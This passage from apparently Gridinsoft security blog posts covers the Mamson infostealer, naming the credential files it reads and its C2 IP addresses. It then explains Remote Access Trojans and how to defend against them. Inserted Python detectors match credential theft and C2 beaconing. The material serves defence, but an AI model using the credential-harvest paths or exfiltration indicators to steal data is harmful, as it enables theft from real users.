To cover its tracks, this malware also manipulates the logs of the Windows Error Reporting system. It edits out the log lines that contain information about the WerFault interactions I mentioned above.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13\Report.wer
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FF4.tmp.dmp

Data Collection

The Mamson infostealer's primary goal is to collect sensitive information. Upon finishing preparations, the malware starts by creating a folder at C:\Users\[USER]\Downloads\cp and copying data from C:\Users\[USER]\AppData\Google\Chrome\User Data\Default\Login Data. That file keeps a wide range of information about the user's credentials and session tokens. It also collects the following data:

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_cbbb49d6-b7ff-44ca-aba5-8a5e250d4d42
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\c74ecc55-989d-484d-a8fe-47bdfda57159
C:\Windows\System32\spp\store\2.0\cache\cache.dat

Additionally, Mamson accesses cryptocurrency apps and wallets in order to harvest credentials. I did not have a spare crypto wallet to sacrifice for the test, so there were no corresponding logs. Once the data collection is complete, the malware sends it to one of its command-and-control servers. Their IP addresses are built into the malware sample:

23.216.147.76:443
23.216.147.64:443
104.86.182.8:443
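The behaviour chain above (registry fingerprinting, WerFault abuse, the sc.exe service start, IdentityCRL config keys, WER log tampering, the Downloads\cp staging folder, the Chrome Login Data read and the C2 addresses) can be turned into a stage-based detection over endpoint telemetry. The following is an added example, not Gridinsoft's code: the Sysmon-like event format, its field names (kind, op, key, path, image, cmdline, dst) and the "three stages means suspicious" threshold are assumptions, and the sample events are constructed.

```python
"""Stage-based detection of the Mamson behaviour chain (added example).
Paths are normalized to forward slashes and lower case before matching."""
import re
from collections import defaultdict

# Indicators taken from the analysis above; everything else is constructed.
C2_ADDRS = {"23.216.147.76", "23.216.147.64", "104.86.182.8"}
FINGERPRINT_KEYS = (
    "software/microsoft/windows nt/currentversion/windows",
    "software/microsoft/windows nt/currentversion/languagepack/datastore_v1.0",
    "software/policies/microsoft/windows/display",
)
IDENTITYCRL = "software/microsoft/identitycrl/immersive/production/property/"


def _norm(s):
    return s.replace("\\", "/").lower()


# Each stage is a predicate over one event; kind is checked first so that
# events of other kinds never trigger a KeyError on missing fields.
STAGES = {
    "fingerprint": lambda e: e["kind"] == "registry" and e["op"] == "read"
        and any(_norm(e["key"]).endswith(k) for k in FINGERPRINT_KEYS),
    "wer_abuse": lambda e: e["kind"] == "process"
        and _norm(e["image"]).endswith("/werfault.exe") and " -u -p " in e["cmdline"],
    "service_start": lambda e: e["kind"] == "process"
        and _norm(e["image"]).endswith("/sc.exe")
        and re.search(r"\bstart\s+w32time\b", e["cmdline"], re.I) is not None,
    "config_store": lambda e: e["kind"] == "registry" and e["op"] == "write"
        and IDENTITYCRL in _norm(e["key"]),
    "log_tamper": lambda e: e["kind"] == "file" and e["op"] in ("write", "delete")
        and "/wer/reportarchive/" in _norm(e["path"]),
    "cred_staging": lambda e: e["kind"] == "file" and e["op"] in ("create", "write")
        and "/downloads/cp/" in _norm(e["path"]) + "/",
    "cred_read": lambda e: e["kind"] == "file" and e["op"] == "read"
        and _norm(e["path"]).endswith("/chrome/user data/default/login data"),
    "c2_exfil": lambda e: e["kind"] == "network" and e["dst"] in C2_ADDRS,
}


def match_stages(events):
    """Return {stage: [event ids]} for every stage whose indicator fired."""
    hits = defaultdict(list)
    for e in events:
        for stage, test in STAGES.items():
            if test(e):
                hits[stage].append(e["id"])
    return dict(hits)


def verdict(events, min_stages=3):
    """One registry read is normal; several stages of the chain together are not."""
    hits = match_stages(events)
    return {"stages": sorted(hits), "suspicious": len(hits) >= min_stages}


# Constructed sample telemetry mirroring the chain described above.
SAMPLE = [
    {"id": 1, "kind": "registry", "op": "read",
     "key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows"},
    {"id": 2, "kind": "process", "image": r"C:\Windows\system32\WerFault.exe",
     "cmdline": "WerFault.exe -u -p 2660 -s 684"},
    {"id": 3, "kind": "process", "image": r"C:\Windows\system32\sc.exe",
     "cmdline": "sc.exe start w32time task_started"},
    {"id": 4, "kind": "registry", "op": "write",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\001880060ADF5C62"},
    {"id": 5, "kind": "file", "op": "create", "path": r"C:\Users\alice\Downloads\cp"},
    {"id": 6, "kind": "file", "op": "read",
     "path": r"C:\Users\alice\AppData\Google\Chrome\User Data\Default\Login Data"},
    {"id": 7, "kind": "file", "op": "delete",  # constructed report folder name
     "path": r"C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_sample_0001\Report.wer"},
    {"id": 8, "kind": "network", "dst": "23.216.147.76", "dport": 443},
    {"id": 9, "kind": "network", "dst": "203.0.113.5", "dport": 443},  # benign, constructed
]
BENIGN = [SAMPLE[0], SAMPLE[8]]  # a lone OS-version lookup plus ordinary HTTPS

if __name__ == "__main__":
    print(verdict(SAMPLE))   # all eight stages, suspicious
    print(verdict(BENIGN))   # only "fingerprint", not suspicious
```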

How To Remove Trojan:Win32/Mamson.A!ac?

To remove Trojan:Win32/Mamson.A!ac you will need a scan with GridinSoft Anti-Malware. Since the malware primarily targets Windows’ built-in defenses, they may be disabled or not working correctly. With GridinSoft Anti-Malware, you will be sure that the malware is completely gone. Run a Full scan to check the entire system and remove even the most covert threats.

Remote Access Trojan (RAT) https://gridinsoft.com/blogs/remote-access-trojan-meaning/ Thu, 16 May 2024 02:11:57 +0000
A Remote Access Trojan is software that allows unauthorized access to a victim's computer or covert surveillance. Remote Access Trojans are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using bandwidth for criminal activity.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim's device completely. Users often download RATs together with a legitimate program, e.g., inside hacked games from torrents or within an email attachment. Once an attacker compromises the host system, they can use it to spread the RAT to additional vulnerable computers, thus creating a botnet. In addition, a RAT can be deployed as a payload by exploit kits. Once successfully deployed, the RAT connects directly to the command-and-control (C&C) server the attackers control, using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim's computer, such as:

  • Use spyware and keyloggers to track the victim’s behavior
  • Gain access to sensitive data, including social security numbers and credit card information
  • View and record video from a webcam and microphone
  • Take screenshots
  • Format disks
  • Download, change or delete files
  • Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. A RAT is similar to Remote Desktop Protocol (RDP) or AnyDesk but differs in its stealth. The RAT establishes a command and control (C2) channel with the attacker's server. This way, attackers can send commands to the RAT, and it returns the requested data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

Remote access trojan mechanism

RATs can be combined with additional modules that provide further capabilities. For example, suppose an attacker gains a foothold using a RAT. Then, after examining the infected system through the RAT, they decide they need to install a keylogger. Depending on their needs, the RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Are Remote Access Trojans Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. They did so by gaining remote access to a computer authenticated to the SCADA (supervisory control and data acquisition) machines that controlled the country's utility infrastructure. In addition, the Remote Access Trojan allowed attackers to access sensitive resources by riding on the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to the level of a threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because such malware typically carries many concealment features that let it evade detection. In addition, RATs manage their resource utilization so that there is no performance degradation, making the threat harder to notice.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

  • Spying and blackmail: An attacker who has deployed a RAT on a user's device gains access to the user's cameras and microphones. Consequently, they can take pictures of the user and their surroundings and then use this to launch more sophisticated attacks or blackmail.
  • Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
  • Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim's computer. By scaling this action to many devices, they can make huge profits.
  • Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims' machines. That way, authorities can't shut down the attacker's account or storage server because the attacker keeps the information on devices belonging to legitimate users.
  • Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

njRAT is probably the best known and the oldest among remote-access trojans. It first appeared in 2012 and keeps receiving updates that adjust its functionality to modern "standards", which accounts for its longevity. The reason for this is probably the attention from state-sponsored threat actors, APT36 and APT41, who have used it in cyberattacks almost since its inception.

Interface of njRAT 0.7 Golden edition

The key functionality of njRAT is typical for pretty much any remote-access trojan: providing remote access. That is topped up with uploading and downloading files on command, logging keystrokes, and capturing microphone and camera input. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It gives attackers full remote administration of the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses the Mimikatz password stealer to authenticate with a pass-the-hash method, reusing operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called "Njw0rm". The malware and all its variants belong to the same family, sharing many features and similarities in their workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting industrial control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly, also called Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim's device. It communicates with the C&C server via the HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, its developers released two significant versions of the RAT. Most likely, it is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and anti-forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable the Task Manager, the firewall, or User Account Control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for the Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user already has such permissions. Since VNC is a legitimate tool, antivirus tools do not identify Heseber as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. The RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once one has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That's why the best way to protect against a Remote Access Trojan is to not give it a chance to run at all. The following methods are proactive measures that severely decrease the chance of malware getting in and of you getting into trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, the strategy for defending against RATs depends on organization-wide security training. Victims usually launch this malware through infected attachments and links in phishing campaigns, so employees must be vigilant so as not to accidentally contaminate the company network and jeopardize the entire organization.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

  • More strict firewall settings
  • Safelisting IP addresses for authorized users
  • Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the "never trust, always verify" principle. Consequently, the zero-trust approach offers precise control over lateral movement instead of granting full network access. It is critical to suppressing RAT attacks, as attackers use lateral movement to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, a Remote Access Trojan is a threat only once it is installed and running on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of a RAT infection. Overall, these actions are good practice for improving security in any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but carry malicious features alongside the real application's functions. Tracking applications and the system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.
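One concrete way to spot the C&C channel described above is to look for hosts that contact the same destination at near-constant intervals (beaconing), and for the odd port a known RAT uses, such as the 31337 called out for Back Orifice. The following is an added example, not Gridinsoft's code: the flow records are constructed, and the jitter threshold, minimum connection count and record layout are assumptions.

```python
"""Beacon detection over outbound flow records (added example).
A flow record is (src, dst, dport, start_time_seconds)."""
from collections import defaultdict
from statistics import mean, pstdev

# Port mentioned above for Back Orifice; a hit is worth a look on its own.
KNOWN_RAT_PORTS = {31337}


def group_flows(flows):
    """Group connection start times by (src, dst, dport)."""
    groups = defaultdict(list)
    for src, dst, dport, ts in flows:
        groups[(src, dst, dport)].append(ts)
    return groups


def beacon_score(timestamps):
    """Return (mean_interval, jitter_ratio) for sorted timestamps, or None
    when there are too few gaps to judge. jitter_ratio is stdev/mean of the
    gaps between connections; values near 0 mean clockwork check-ins."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 3:
        return None
    m = mean(gaps)
    return (m, pstdev(gaps) / m if m else float("inf"))


def find_beacons(flows, min_connections=4, max_jitter=0.2):
    """Flag (src, dst, dport) tuples that check in at near-constant intervals
    or that talk to a port a known RAT uses. Returns [(key, [reasons])]."""
    findings = []
    for key, ts in group_flows(flows).items():
        ts.sort()
        reasons = []
        if key[2] in KNOWN_RAT_PORTS:
            reasons.append("known RAT port")
        score = beacon_score(ts)
        if score and len(ts) >= min_connections and score[1] <= max_jitter:
            reasons.append(f"periodic every ~{score[0]:.0f}s (jitter {score[1]:.2f})")
        if reasons:
            findings.append((key, reasons))
    return findings


# Constructed flow records (all addresses from documentation ranges):
# host .10 checks in with 203.0.113.7 every 60 s with a little jitter,
# host .11 browses 198.51.100.20 at irregular times,
# host .12 makes a single connection to port 31337.
FLOWS = (
    [("10.0.0.10", "203.0.113.7", 443, 1000 + 60 * i + (i % 3)) for i in range(10)]
    + [("10.0.0.11", "198.51.100.20", 443, t) for t in (1000, 1004, 1180, 1181, 1500, 2300)]
    + [("10.0.0.12", "198.51.100.21", 31337, 1700)]
)

if __name__ == "__main__":
    for key, reasons in find_beacons(FLOWS):
        print(key, "->", "; ".join(reasons))
```

Real RATs often add random sleep to their check-in interval, so treat max_jitter as a tuning knob and pair this with the other signals on this page rather than relying on periodicity alone.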

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.
